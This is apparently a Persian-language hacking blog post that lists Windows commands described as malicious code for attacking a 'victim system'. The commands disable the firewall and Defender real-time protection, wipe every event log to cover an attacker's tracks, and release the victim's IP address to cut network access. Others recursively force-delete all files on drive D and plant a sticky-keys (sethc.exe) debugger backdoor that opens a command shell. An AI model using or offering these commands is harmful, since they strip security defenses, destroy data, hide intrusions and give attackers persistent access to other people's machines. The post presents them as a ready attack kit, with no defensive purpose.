کسب در آمد

𝓢𝓐ℬ𝓐𝓦𝓔ℬ

Hacking@Security
DERAQOULA

DęЯǞqΦЦlǞ

𝓢𝓐ℬ𝓐𝓦𝓔ℬ

𝓢𝓐ℬ𝓐𝓦𝓔ℬ




    DERAQOULA

    💢 آنقدر از زندگي دلتنگ و دلگيرم
    😔(کــــــــــــــه)😔
    روز مرگ خود را جشن مي گيرم 💢


Writers
Last Comments
  • ۹ آبان ۹۸، ۰۱:۰۴ - ناشناس
    *** *** **

Subjects

با سلام خدمت همگی کاربرای عزیز

توی این پست یکسری کدهای مخرب قرار میدم و قراره هر از چند گاهی این پست بروزرسانی بشه

البته مخرب بودن این کدها بستگی به نظر شما داره و ممکنه از دید یه کاربر کاربردی باشه و از دید یه کاربر دیگه مخرب !!!

اما چون بحث ما ویروس نویسی هستش به همین خاطر بهتره که از دید یه کد مخرب بهش نگاه کنیم و بیشترین کاربردشو توی نفوذ بدونیم

ضمنا اگه تکه کدی خواستین ولی نمیدونستین چطور میشه نوشت بهم بگین که توی پست قرار بدم

چون من چیز زیادی به ذهنم نمیرسه و فقط میخوام بعد از چند وقت حال و هوای کاربرای وب رو عوض کنم

همچنین پیشنهاد میکنم دستورات مرگبار ویندوزی رو + قسمت های دیگه مثل تکه کدهارو هم یه نیم نگاه بندازین :)

کد از کار انداختن فایروال سیستم قربانی

Netsh advfirewall set allprofiles state off

کد فعال کردن فایروال

Netsh advfirewall set allprofiles state on

البته با کد پایین هم میشه اینکار رو انجام داد

Netsh firewall set opmode enable

و برای فعال کردن هم

Netsh firewall set opmode enable

کد فعال کردن تلنت برای ویندوز 7 و 8 و 10

برای ویندوز XP هم بصورت پیشفرض فعال هستش...

Dism /online /Enable-Feature /FeatureName:TelnetClient

کد غیر فعال کردن تلنت

Dism /online /Disable-Feature /FeatureName:TelnetClient

کد خالی کردن Event Log و حذف رد پای کوچکی از حمله ی هکر

For /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

کد از کار انداختن آنتی ویروس

دقت کنین برای اینکار اگه دسترسی بالایی هم داشته باشیم نمیشه اینکار رو انجام داد

پس مجبوریم از یه تکه کد پاورشل برای اینکار استفاده کنیم که اینجوری میشه

start Powershell Set-MpPreference -DisableRealtimeMonitoring $true

کد از کار انداختن اینترنت سیستم

با استفاده از این دستور ما میتونیم آی پی خودمون رو پاک کنیم که اینکار باعث میشه دیگه اینترنت کار نکنه

البته اگه به شبکه متصل باشیم اینترنت کل سیستم های داخل شبکه از کار میفته که برای جلوگیری از اینکار هم میتونیم اسم سیستم رو بعد از نوشتن دستور بنویسیم

IPconfig /Release

و اگر هم میخواین مجددا اینترنتتون درست بشه

میتونین از دستور پایین استفاده کنین که البته آی پی سیستمتون هم عوض میشه ( داخل شبکه )

برای جلوگیری از تغییر آی پی همه سیستم های شبکه هم میتونین کاری که برای تکه کد قبلی گفتم رو انجام بدید

IPconfig /ReNew

با استفاده از کد پایین میتونیم دخل اطلاعات یکی از درایوهای سیستم قربانی رو پایین بیاریم که اینجا درایو مد نظر من درایو D هستش

For /R D:\ %i in (*) do del /F /S /Q %i CLS

البته تو کد بالا میتونیم به جای ستاره از نقطه هم استفاده کنیم و به جای del هم از RmDir استفاده کنیم

تا دخل فولدرهای یه درایو پایین بیاد

همچنین برای جمع آوری اطلاعات تکمیلی پیشنهاد میکنم این پست رو بخونید

ایجاد درب پشتی روی سیستم قربانی

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe

کد بالا میتونه گاهی مواقع به کمک خودتونم بیاد

مثلا برای امنیت بیشتر خودتون یه برنامه تهیه کنید که یه رمز توی ورودی بگیره و اگه اون رمز درست بود دسترسی به خط فرمان رو آزاد کنه

یا اینکه میتونین زمانی که رمز سیستم یادتون میره ازش استفاده کنید

اطلاعات تکمیلی راجب این کدهم اینجا قرار داره

کد تغییر تصویر زمینه ی سیستم قربانی

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d  Masir-Aks /f

تو کد بالا به جای Masir-Aks باید مسیر عکستون رو قرار بدین.

امیدوارم خسته نشده باشید

موفق و سربلند باشید

Telegram Channel

 Robot Messenger


    • DęЯǞqΦЦlǞ

Comments (۰)

There Are No Comments Yet
ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی